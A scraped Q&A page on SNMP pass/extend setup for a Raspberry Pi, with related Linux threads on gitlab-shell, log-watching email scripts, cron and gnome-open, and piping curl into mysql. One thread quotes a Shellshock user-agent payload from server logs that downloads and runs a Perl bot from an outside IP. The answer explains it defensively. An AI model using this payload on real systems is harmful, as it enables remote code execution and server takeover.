SNMP pass command returning OID error but apparently running on server - snmp

I'm just moving my first steps with SNMP, I'm trying to add the output of a simple check script to SNMP but I'm facing some issues.
I'm trying to add a temperature check file for a Raspberry Pi 4 to be returned via SNMP to a remote poller, but just following most of the guides online lead to me to nothing, since I'm stuck with this error every time:
No Such Instance currently exists at this OID
I'm trying using the pass function but I had no luck getting any result.
Currently this is what I declared in the snmpd.conf file:
pass 1.3.6.1.2.1.25.1.8 /bin/bash /script/check_temp.sh
This is the command output:
/script/check_temp.sh
.1.3.6.1.2.1.25.1.8
integer
589
This is the command output from the poller:
snmpget -c test -v 2c 1.2.3.4 .1.3.6.1.2.1.25.1.8
HOST-RESOURCES-MIB::hrSystem.8 = No Such Instance currently exists at this OID
But if I try to run snmpd in foreground I don't actually see any error, seems instead that the script is executed:
sudo snmpd -f -Le -Ducd-snmp/pass -Drun
registered debug token ucd-snmp/pass, 1
registered debug token run, 1
NET-SNMP version 5.7.3
ucd-snmp/pass: pass-running: /bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8
run:exec: running '/bin/bash /usr/script/check_temperature/check_temp.sh -g .1.3.6.1.2.1.25.1.8'
run:exec: got 120000 bytes
run:exec: child 7480 finished. result=768
What am I doing wrong? None of the guides I checked mentioned creating MIBS, or any other further steps than I'm already doing, but I'm still getting nothing of what I'm expecting.
Thanks in advance for any hint or suggestion that'll get me on the right way.

I hope this could help anybody trying to configure SNMP checks for their Raspberry, or any other tipycal Linux device, since most of the guides I checked were assuming you would already know some SNMP concepts, while it's possible that while you are just starting you are still not mastering them.
Most of the guides will either state to use extend or passas following:
view all included .1.3.6.1.4.1
pass .1.3.6.1.4.1.9999.1 /bin/bash /path/to/command
extend checkcommand /bin/bash /path/to/command
Like this, I faced the issues of my original question; I was able to get things working only when I added the following lines, providing an empty OID branch to the extend function and the view all accessibility to the .1.3.6.1.4.1 branch:
view all included .1.3.6.1.4.1
extend .1.3.6.1.4.1.9999.1 checkcommand /bin/bash /path/to/command
This way I actually get a reply from snmpwalk, and from snmpwalk result on OID .1.3.6.1.4.1.9999.1 you can retrieve the OID snmpd builds for the output of the script, in order to use it to make snmp queries from a poller.
I know this probably is the basis, but all the tutorials and guides I read at first were likely implying one or more of these steps, so I hope this can be of help to any other SNMP beginner.

Related

How to use gitlab-shell?

I can't seem to find any information or examples about how to use gitlab-shell. My initial approach was simply to attempt an SSH session from my development box to the server. I received an error response like the one from this post:
jacob#mypc: ssh git#git.example.com:
PTY allocation request failed on channel 0
Welcome to GitLab, jacob!
Connection to git.example.com closed.
The error was alleviated by adding the -T parameter like this user does:
jacob#mypc: ssh git#git.example.com:
Welcome to GitLab, jacob!
However, as would be expected with the -T parameter, I am not presented with a shell. At this point I'm not sure what to do. How is gitlab-shell supposed to be used?

linux script to send me an email every time a log file changes

I am looking for a simple way to constantly monitor a log file, and send me an email notification every time thhis log file has changed (new lines have been added to it).
The system runs on a Raspberry Pi 2 (OS Raspbian /Debian Stretch) and the log monitors a GPIO python script running as daemon.
I need something very simple and lightweight, don't even care to have the text of the new log entry, because I know what it says, it is always the same. 24 lines of text at the end.
Also, the log.txt file gets recreated every day at midnight, so that might represent another issue.
I already have a working python script to send me a simple email via gmail (called it sendmail.py)
What I tried so far was creating and running the following bash script:
monitorlog.sh
#!/bin/bash
tail -F log.txt | python ./sendmail.py
The problem is that it just sends an email every time I execute it, but when the log actually changes, it just quits.
I am really new to linux so apologies if I missed something.
Cheers
You asked for simple:
#!/bin/bash
cur_line_count="$(wc -l myfile.txt)"
while true
do
new_line_count="$(wc -l myfile.txt)"
if [ "$cur_line_count" != "$new_line_count" ]
then
python ./sendmail.py
fi
cur_line_count="$new_line_count"
sleep 5
done
I've done this a bunch of different ways. If you run a cron job every minute that counts the number of lines (wc -l) compares that to a stored count (e.g. in /tmp/myfilecounter) and sends the emails when the numbers are different.
If you have inotify, there are more direct ways to get "woken up" when the file changes, e.g https://serverfault.com/a/780522/97447 or https://serverfault.com/search?q=inotifywait.
If you don't mind adding a package to the system, incron is a very convenient way to run a script whenever a file or directory is modified, and it looks like it's supported on raspbian (internally it uses inotify). https://www.linux.com/learn/how-use-incron-monitor-important-files-and-folders. Looks like it's as simple as:
sudo apt-get install incron
sudo vi /etc/incron.allow # Add your userid to this file (or just rm /etc/incron.allow to let everyone use incron)
incron -e # Add the following line to the "cron" file
/path/to/log.txt IN_MODIFY python ./sendmail.py
And you'd be done!

Getting very strange user agent in logs

My logs shows a very strange user agent which is shown below:
() { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx"
Can anyone tell what is it trying to do... I think it is hacking attempt and how can restrict access to it.
That does indeed look like an attempt to exploit the Shellshock bash bug. https://security.stackexchange.com/questions/68122/what-is-a-specific-example-of-how-the-shellshock-bash-bug-could-be-exploited
The sender of that request is trying to get your machine to download a purl script called efixx from http://151.236.44.210/ and then execute it. That purl script is the "LinuxNet perlbot".
You should check to make sure you don't have the file called "efixx" on your computer and if you do make sure it isn't running. Also make sure you are running the latest version of bash and you should be ok.

Can Cron Jobs Use Gnome-Open?

I am running Ubuntu 11.10 (Unity interface) and I created a Bash script that uses 'gnome-open' to open a series of web pages I use every morning. When I manually execute the script in the Terminal, the bash script works just fine. Here's a sample of the script (it's all the same so I've shortened it):
#!/bin/bash
gnome-open 'https://docs.google.com';
gnome-open 'https://mail.google.com';
Since it seemed to be working well, I added a job to my crontab (mine, not root's) to execute every weekday at a specific time.
Here's the crontab entry:
30 10 * * 1,2,3,4,5 ~/bin/webcheck.sh
The problem is this error gets returned for every single 'gnome-open' command in the bash script:
GConf-WARNING **: Client failed to connect to the D-BUS daemon:
Unable to autolaunch a dbus-daemon without a $DISPLAY for X11
GConf Error: No D-BUS daemon running
Error: no display specified
I did some searching to try and figure this out. The first thing I tried was relaunching the daemon using SIGHUP:
killall -s SIGHUP gconfd-2
That didn't work so I tried launching the dbus-daemon using this code from the manpage for dbus-launch:
## test for an existing bus daemon, just to be safe
if test -z "$DBUS_SESSION_BUS_ADDRESS" ; then
## if not found, launch a new one
eval `dbus-launch --sh-syntax --exit-with-session`
echo "D-Bus per-session daemon address is: $DBUS_SESSION_BUS_ADDRESS"
fi
But that didn't do anything.
I tried adding simply 'dbus-launch' at the top of my bash script and that didn't work either.
I also tried editing the crontab to include the path to Bash, because I saw that suggestion on another thread but that didn't work.
Any ideas on how I can get this up and running?
Here is how the problem was solved. It turns out the issue was primarily caused by Bash not having access to an X window session (or at least that's how I understood it). So my problem was solved by editing my crontab like so:
30 10 * * 1,2,3,4,5 export DISPLAY=:0 && ~/bin/webcheck.sh
The "export DISPLAY=:0" statement told cron which display to use. I found the answer on this archived Ubuntu forum after searching for "no display specified" or something like that:
http://ubuntuforums.org/archive/index.php/t-105250.html
So now, whenever I'm logged in, exactly at 10:30 my system will automatically launch a series of webpages that I need to look at every day. Saves me having to go through the arduous process of typing in my three-letter alias every time :)
Glad you asked!
It depends on when it is run.
If the Gnome GDM Greeter is live, you can use the DBUS session from the logon dialog, if you will. You can, e.g., use this to send notifications to the logon screen, if no-one is logged in:
function do_notification
{
for pid in $(pgrep gnome-session); do
unset COOKIE
COOKIE="$(grep -z DBUS_SESSION_BUS_ADDRESS /proc/$pid/environ|cut -d= -f2-)"
GNUSER="$(ps --no-heading -o uname $pid)"
echo "Notifying user $GNUSER (gnome-session $pid) with '$#'"
sudo -u "$GNUSER" DBUS_SESSION_BUS_ADDRESS="$COOKIE" /usr/bin/notify-send -c "From CRON:" "$#"
done
unset COOKIE
}
As you can see the above code simply runs the same command (notify-send) on all available gnome-sessions, when called like:
do_notification "I wanted to let you guys know"
You can probably pick this apart and put it to use for your own purposes.

Pass result of Curl request to mysql command line

SO this is a bit of an odd request but hoping someone on here knows some command line fu. Might have to post to serverfault too, we'll see.
I'm trying to figure out how i can pass the results of a curl request to the mysql command line application. So basically something kinda like this -
mysql --user=root --password=my_pass < (curl http://localhost:3000/application.sql)
where that URL returns basically a text response with sql statements.
Some context:
An application I am developing supports multiple installations, as part of the installation process for a new instance we spin up a copy of our "data" database for the new instance.
I'm trying to automate the deployment process as much as possible so I built a small "dashboard" app in rails that can generate the sql statements, config files, etc for each instance and also helps us see stats about the instances and other fun stuff. Now I'm writing capistrano tasks to actually do a deployment based on the ID of the installation which i pass in as a variable.
The initial deployment setup includes creating the applications database, which this sql request will do. I could in theory pull the file in a wget request, execute and delete it but I thought it would be cleaner to just tell the remote server to curl request it and execute it in one step.
So any ideas?
I'm fairly certain the syntax you have originally won't work as the '<' expects a file. Instead you want to pipe the output of curl, which by default prints to STDOUT to mysql.
I believe the following will work for you.
curl http://localhost:3000/application.sql | mysql --user=root --password=my_pass
In Bash, you can do process substitution:
mysql ... < <(curl ...)

Resources